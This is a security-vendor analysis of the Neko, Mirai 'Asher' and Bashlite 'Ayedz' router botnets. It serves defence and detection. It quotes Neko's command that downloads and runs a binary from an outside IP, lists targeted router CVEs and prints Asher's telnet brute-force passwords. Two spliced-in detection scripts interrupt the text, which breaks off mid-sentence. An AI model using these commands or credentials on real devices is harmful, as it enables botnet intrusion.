Neko, Mirai and Bashlite Target Routers, Devices

Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. These malware variants enlist infected routers to botnets that are capable of launching distributed denial of service (DDoS) attacks.

By: Augusto Remillano II, Jakub Urbanec
August 13, 2019
Read time: 6 min (1826 words)
Source: https://www.trendmicro.com/en_us/research/19/h/back-to-back-campaigns-neko-mirai-and-bashlite-malware-variants-use-various-exploits-to-target-s… (15 pages, printed 1/22/2021)

Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. On July 22, 2019, we saw and started analyzing a Neko botnet sample, then observed another sample with additional exploits the following week. A Mirai variant that calls itself “Asher” surfaced on July 30, then a Bashlite variant called “Ayedz” the following week. These malware variants enlist infected routers to botnets that are capable of launching distributed denial of service (DDoS) attacks.

Neko

On July 22, our honeypots detected a botnet sample, x86.neko (detected by Trend Micro as Backdoor.Linux.NEKO.AB), that brute-forces weak credentials. It then issues the following commands:

“cd /tmp/; wget hxxp://185.244.25.200/bins/x86.neko; chmod 777 x86.neko; ./x86.neko”

Our research indicates that this botnet has versions for various processor architectures. Upon analysis, we discovered that the Neko botnet is capable of executing several backdoor commands: it can execute shell commands as well as launch user datagram protocol (UDP) and UDP-HEX flood attacks, inundating a router’s ability to properly process and respond to information. It is also capable of killing processes (the “killer” function is found in its body).

Neko also holds within it an extensive kill list of other malware-related processes that it will terminate. Further examination of the Neko botnet code shows that it comes with scanners that are capable of looking for multiple exploits that would allow the malware to propagate itself to other vulnerable devices:

  • Eir WAN side remote command injection (TR-064) – a wide area network (WAN) side RCE for Eir D1000 routers
  • HNAP SOAPAction-Header Command Execution (CVE-2015-2051) – RCE for multiple D-Link routers caused by an error in handling malicious HTTP requests
  • Huawei Router HG532 - Arbitrary Command Execution (CVE-2017-17215) – RCE for the Huawei HG532 router caused by the improper validation of a configuration file
  • GPON Routers - Authentication Bypass / Command Injection (CVE-2018-10561, CVE-2018-10562) – RCE for DASAN GPON home routers caused by authentication bypass and command injection
  • Linksys E-series - Remote Code Execution – RCE caused by an unauthenticated OS command injection
  • MVPower Shell Command Execution – exploits an unauthenticated RCE vulnerability in MVPower digital video recorders (DVRs)
  • ThinkPHP 5.0.23/5.1.31 RCE – RCE for the open-source web development framework ThinkPHP 5.0.23/5.1.31
  • Realtek SDK - Miniigd UPnP SOAP Command Execution (CVE-2014-8361) – RCE caused by an unauthenticated OS command injection in devices that use the Realtek SDK with the miniigd daemon

Aside from the abovementioned exploits, we observed that the Neko botnet also scans for vulnerable Africo devices. We are unable to determine which Africo device Neko scans for, and we noted that it does not seem to be linked to any specific exploit. However, we noticed that this vulnerability structure is similar to Netgear DGN1000 / DGN2200, an unauthenticated RCE on Netgear DGN devices.

Figure 1. Neko botnet code showing how it scans for Africo devices

On July 29, our honeypots collected an updated Neko botnet sample (detected by Trend Micro as Backdoor.Linux.NEKO.AC). This time, the file is UPX-packed with its magic number (UPX!) tampered, in an attempt to prevent the botnet from being unpacked.

Figure 2. UPX-packed Neko botnet code with an altered magic number

We discovered that this new botnet sample has an expanded scanner function and uses additional exploits for propagation. Interestingly, the list of exploits now includes the Netgear DGN1000 / DGN2200 — the vulnerability that shares a similar structure as the Africo scan.

Figure 3. Neko botnet code showing how it scans for Netgear DGN1000 / DGN2200

The updated version of the Neko botnet also scans for multiple CCTV-DVR vendors and Netgear R7000 and R6400 routers (CVE-2016-6277).

Figures 4 and 5. Neko botnet code showing how it scans for a variety of CCTV-DVR exploits and Netgear R7000 and R6400 routers

This Neko variant also scans for “awsec”, which has a similar vulnerability structure as that of the Vacron NVR RCE.

Figure 6. Neko botnet code showing how it scans for “awsec”

In addition, the Neko botnet also attempts to scan for “cisco” and “wap54g”. However, based on our analysis, both commands are unable to successfully exploit any vulnerability.
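The tampered UPX magic seen in the July 29 sample (Figure 2) can be spotted without unpacking: a stock UPX build leaves its banner strings in the file even when the 4-byte “UPX!” magic has been overwritten. The following Python check is an added analyst example, not code from Trend Micro or this article; its sample bytes are constructed and the UPX layout it sketches is illustrative, not byte-exact.

```python
import re
import sys

UPX_MAGIC = b"UPX!"
# Banner strings stock UPX writes into every packed file. The tampering described
# for the July 29 Neko sample alters the 4-byte magic, not these strings.
UPX_BANNERS = (
    rb"\$Info: This file is packed with the UPX executable packer",
    rb"\$Id: UPX \d+\.\d+ Copyright",
)

def classify_upx(data: bytes) -> dict:
    """Classify an ELF blob by the UPX marks it carries (heuristic, not byte-exact).

    upx-intact      banner and "UPX!" magic present; a stock `upx -d` should unpack it
    upx-tampered    banner present but no "UPX!" anywhere; the magic was overwritten
    upx-magic-only  "UPX!" present without a banner (weak signal, may be coincidental)
    no-upx-marks    nothing UPX-like found
    not-elf         no ELF identification bytes
    """
    if data[:4] != b"\x7fELF":
        return {"verdict": "not-elf", "magic_offsets": [], "banner": False}
    banner = any(re.search(p, data) for p in UPX_BANNERS)
    magic_offsets = [m.start() for m in re.finditer(re.escape(UPX_MAGIC), data)]
    if banner and magic_offsets:
        verdict = "upx-intact"
    elif banner:
        verdict = "upx-tampered"
    elif magic_offsets:
        verdict = "upx-magic-only"
    else:
        verdict = "no-upx-marks"
    return {"verdict": verdict, "magic_offsets": magic_offsets, "banner": banner}

def build_sample(tamper: bool) -> bytes:
    """Constructed stand-in for a UPX-packed ELF; the layout is illustrative only."""
    # A real tampered sample may hold any bytes here; zeros are a constructed placeholder.
    magic = b"\x00\x00\x00\x00" if tamper else UPX_MAGIC
    e_ident = b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    l_info = b"\xde\xad\xbe\xef" + magic + b"\x0c\x00\x0d\x16"  # checksum, magic, size, version, format
    banner = (b"$Info: This file is packed with the UPX executable packer http://upx.sf.net $\n"
              b"$Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $\n")
    pack_header = magic + b"\x00" * 28  # the trailing PackHeader also starts with the magic
    return e_ident + b"\x00" * 48 + l_info + b"\x11" * 256 + banner + pack_header

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample(tamper=True)
    print(classify_upx(blob))
```

Run it with a file path to classify a real binary; a “upx-tampered” verdict tells the analyst to repair the magic before trying a stock unpacker rather than concluding the sample is not packed.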
“Cisco” appears to be attempting to use CVE-2018-15379, wherein the HTTP web server for Cisco Prime Infrastructure has unrestricted directory permission, allowing RCE. However, the payload does not use the correct URI path, hence the vulnerability is not exploited.

Figure 7. Neko botnet code showing how it scans for “cisco”

Meanwhile, the “wap54g” payload’s HTTP headers and message body were improperly formatted, which may have caused the attempt to exploit the Linksys WAP54Gv3 Remote Debug Root Shell vulnerability to fail.

Figure 8. Neko botnet code showing how it scans for “wap54g”

Mirai variant “Asher”

On July 30, our telemetry revealed another router malware — a Mirai variant (detected by Trend Micro as Backdoor.Linux.MIRAI.VWIRC). Typical of Mirai, this variant infects devices with BusyBox, a software suite for devices with limited resources. It first checks for the presence of BusyBox by executing the "/bin/busybox {any string}" command. If the device’s system responds with "{any string} applet not found," the bot will proceed with its operation. The malware variant’s authors used the {any string} part to “name” the malware; in this case, they used “Asher.”

Figure 9. Screenshot showing the command that checks for the presence of BusyBox

The “Asher” variant can infiltrate routers by brute-forcing its way in using the following telnet login credentials:

  • 12345
  • 2011vsta
  • 2601hx
  • 4321
  • admin
  • daemon
  • default
  • guest
  • OxhlwSG8
  • pass
  • password
  • root
  • S2fGqNFs
  • support
  • D13hh[
  • synnet
  • t0talc0ntr0l4!
  • taZz@23495859
  • tlJwpbo6
  • vizxv
  • xc3511

We discovered that Asher propagates by scanning for the following router exploits. We also saw that it shares two similar exploits with Neko:

Figure 10. The exploits the Asher botnet scans for

  • GPON Routers - Authentication Bypass / Command Injection (CVE-2018-10561, CVE-2018-10562) – RCE for DASAN GPON home routers caused by authentication bypass and command injection
  • MVPower Shell Command Execution – an unauthenticated RCE in MVPower DVR TV-7104HE 1.8.4 115215B9 digital video recorders
  • Realtek SDK - Miniigd UPnP SOAP Command Execution (CVE-2014-8361) – RCE caused by an unauthenticated OS command injection in devices that use the Realtek SDK with the miniigd daemon

Figure 11. Code showing how the Asher botnet scans for DVRs with the MVPower Shell Command Execution vulnerability

Figure 12. Code showing how the Asher botnet scans for CVE-2014-8361

Figure 13. Code showing how the Asher botnet scans for CVE-2018-10561 and CVE-2018-10562

Bashlite variant “Ayedz”

On August 6, our telemetry pointed to a botnet sample of yet another router malware, this time a Bashlite variant that seems to refer to itself as “Ayedz” (detected by Trend Micro as Backdoor.Linux.BASHLITE.SMJC, Backdoor.Linux.BASHLITE.SMJC8, and Backdoor.Linux.BASHLITE.SMJC4), based on this malware’s file name. Upon
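Three behaviours described above make good honeypot triage rules: Neko’s download, chmod and execute command chain, Asher’s “/bin/busybox {any string}” self-naming probe, and Asher’s telnet password list. The script below is an added example, not Trend Micro’s tooling; the log format, the RFC 5737 addresses, the defanged URL and the COMMON_APPLETS allowlist are assumptions.

```python
import re
from collections import defaultdict

# Telnet passwords the write-up attributes to the Asher brute-forcer.
ASHER_TELNET_PASSWORDS = {
    "12345", "2011vsta", "2601hx", "4321", "admin", "daemon", "default", "guest",
    "OxhlwSG8", "pass", "password", "root", "S2fGqNFs", "support", "D13hh[", "synnet",
    "t0talc0ntr0l4!", "taZz@23495859", "tlJwpbo6", "vizxv", "xc3511",
}
COMMON_APPLETS = {"sh", "ls", "cat", "echo", "ps", "kill", "wget", "tftp"}  # assumption: ordinary applets

LINE = re.compile(r"^(\S+)\s+(\S+)\s+(login|cmd)\s+(.*)$")
BUSYBOX_PROBE = re.compile(r"/bin/busybox\s+([A-Za-z0-9_]+)")
# Neko's "wget ...; chmod 777 x; ./x" shape: fetch, mark executable, run the same file.
DOWNLOAD_EXEC = re.compile(r"(?:wget|curl|tftp)\s+\S+.*?chmod\s+\S+\s+([^\s;]+).*?\./([^\s;]+)")

# Constructed honeypot log (RFC 5737 addresses, defanged URL); not real telemetry.
HONEYPOT_LOG = """\
2019-07-30T10:01:02Z 203.0.113.5 login root/xc3511
2019-07-30T10:01:03Z 203.0.113.5 cmd /bin/busybox Asher
2019-07-22T08:14:10Z 198.51.100.7 login admin/admin
2019-07-22T08:14:11Z 198.51.100.7 cmd cd /tmp/; wget hxxp://198.51.100.99/bins/x86.neko; chmod 777 x86.neko; ./x86.neko
2019-07-22T09:00:00Z 192.0.2.44 login root/correct-horse
2019-07-22T09:00:01Z 192.0.2.44 cmd /bin/busybox ls
"""

def triage(log_text: str) -> dict:
    """Map each source address to the bot-like behaviours seen in its session lines."""
    findings = defaultdict(list)
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that do not follow the constructed format
        _ts, src, kind, detail = m.groups()
        if kind == "login":
            user, _, password = detail.partition("/")
            if password in ASHER_TELNET_PASSWORDS:
                findings[src].append(f"asher-list-credential {user}/{password}")
            continue
        probe = BUSYBOX_PROBE.search(detail)
        if probe and probe.group(1) not in COMMON_APPLETS:
            findings[src].append(f"busybox-probe name={probe.group(1)}")  # the bot's self-chosen name
        chain = DOWNLOAD_EXEC.search(detail)
        if chain and chain.group(1) == chain.group(2):
            findings[src].append(f"download-and-execute {chain.group(2)}")
    return dict(findings)

if __name__ == "__main__":
    for src, events in triage(HONEYPOT_LOG).items():
        print(src, "->", "; ".join(events))
```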